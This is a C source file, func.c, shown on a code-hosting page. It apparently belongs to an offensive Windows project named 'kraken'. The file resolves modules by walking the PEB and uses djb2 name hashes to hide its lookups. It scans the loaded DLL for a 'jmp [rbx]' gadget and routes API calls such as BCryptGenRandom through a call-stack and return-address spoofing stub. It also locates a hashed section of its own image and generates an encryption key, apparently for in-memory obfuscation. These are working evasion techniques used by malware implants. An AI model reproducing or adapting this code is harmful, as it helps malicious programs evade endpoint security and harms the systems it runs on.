-
Notifications
You must be signed in to change notification settings - Fork 40
/
Copy pathfunc.c
107 lines (84 loc) · 3.1 KB
/
func.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include "kraken.h"
PBYTE FindGadget(PVOID base, DWORD size, PBYTE pattern, DWORD patternSize)
{
for (DWORD i = 0; i < size - patternSize; i++)
{
if (memcmp((PBYTE)base + i, pattern, patternSize) == 0)
{
return (PBYTE)base + i;
}
}
return 0x0;
}
DWORD HashStringDjb2W(LPCWSTR String)
{
ULONG Hash = 5381;
INT c = 0;
while (c = *String++)
Hash = ((Hash << 5) + Hash) + c;
return Hash;
}
DWORD HashStringDjb2A(LPCSTR String)
{
ULONG Hash = 5381;
INT c = 0;
while (c = *String++)
Hash = ((Hash << 5) + Hash) + c;
return Hash;
}
PVOID SearchGadgetOnKernelBaseModule(PBYTE pbPattern, DWORD dwPatternSize)
{
PTEB pCurrentTeb = (PTEB)__readgsqword(0x30);
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
PVOID pLdrDataEntryFirstEntry = (PVOID)((PBYTE)pCurrentPeb->Ldr->InMemoryOrderModuleList.Flink->Flink);
LIST_ENTRY* pListParser = (DWORD64)pLdrDataEntryFirstEntry - 0x10;
while (pListParser->Flink != pLdrDataEntryFirstEntry)
{
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = pListParser;
if (HashStringDjb2W(pLdrDataEntry->BaseDllName.Buffer) == 0x3ec3feb)
{
PVOID pGagetRet = FindGadget(pLdrDataEntry->DllBase, (DWORD)pLdrDataEntry->SizeOfImage, pbPattern, dwPatternSize);
return pGagetRet;
}
pListParser = pListParser->Flink;
}
}
PVOID GetNtdllAddr() {
PTEB pCurrentTeb = (PTEB)__readgsqword(0x30);
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
return ((PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->Ldr->InMemoryOrderModuleList.Flink->Flink - 0x10))->DllBase;
}
PVOID Spoofer(PVOID pFunction, PVOID pArg1, PVOID pArg2, PVOID pArg3, PVOID pArg4, PVOID pArg5, PVOID pArg6, PVOID pArg7, PVOID pArg8)
{
BYTE bPattern[] = { 0xFF, 0x23 };
PVOID pGadgetAddr = NULL;
pGadgetAddr = SearchGadgetOnKernelBaseModule(bPattern, 2);
PRM param = { pGadgetAddr, pFunction };
PVOID pRet = SpoofStub(pArg1, pArg2, pArg3, pArg4, ¶m, pArg5, pArg6, pArg7, pArg8);
return pRet;
}
VOID GenerateKey(BYTE* key, DWORD keySize)
{
BCRYPT_ALG_HANDLE hAlgorithm = NULL;
SPOOF(BCryptOpenAlgorithmProvider, &hAlgorithm, BCRYPT_RNG_ALGORITHM, NULL);
SPOOF(BCryptGenRandom,hAlgorithm, key, keySize);
SPOOF(BCryptCloseAlgorithmProvider,hAlgorithm, 0);
}
BOOL TakeSectionInfo(PSECTION_INFO SecInfo)
{
PTEB pCurrentTeb = (PTEB)__readgsqword(0x30);
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pCurrentPeb->ImageBaseAddress;
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pCurrentPeb->ImageBaseAddress + pImageDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER pSectionHeader = IMAGE_FIRST_SECTION(pImageNtHeaders);
for (WORD i = 0; i < pImageNtHeaders->FileHeader.NumberOfSections; i++) {
if (HashStringDjb2A(pSectionHeader[i].Name) == 0xb80c0d8)
{
SecInfo->pAddr = (((DWORD_PTR)pCurrentPeb->ImageBaseAddress) + pSectionHeader[i].VirtualAddress);
(DWORD_PTR)SecInfo->pAddr += SECTION_HEADER_SIZE;
SecInfo->dwSize = (pSectionHeader[i].SizeOfRawData - SECTION_HEADER_SIZE);
return TRUE;
}
}
return FALSE;
}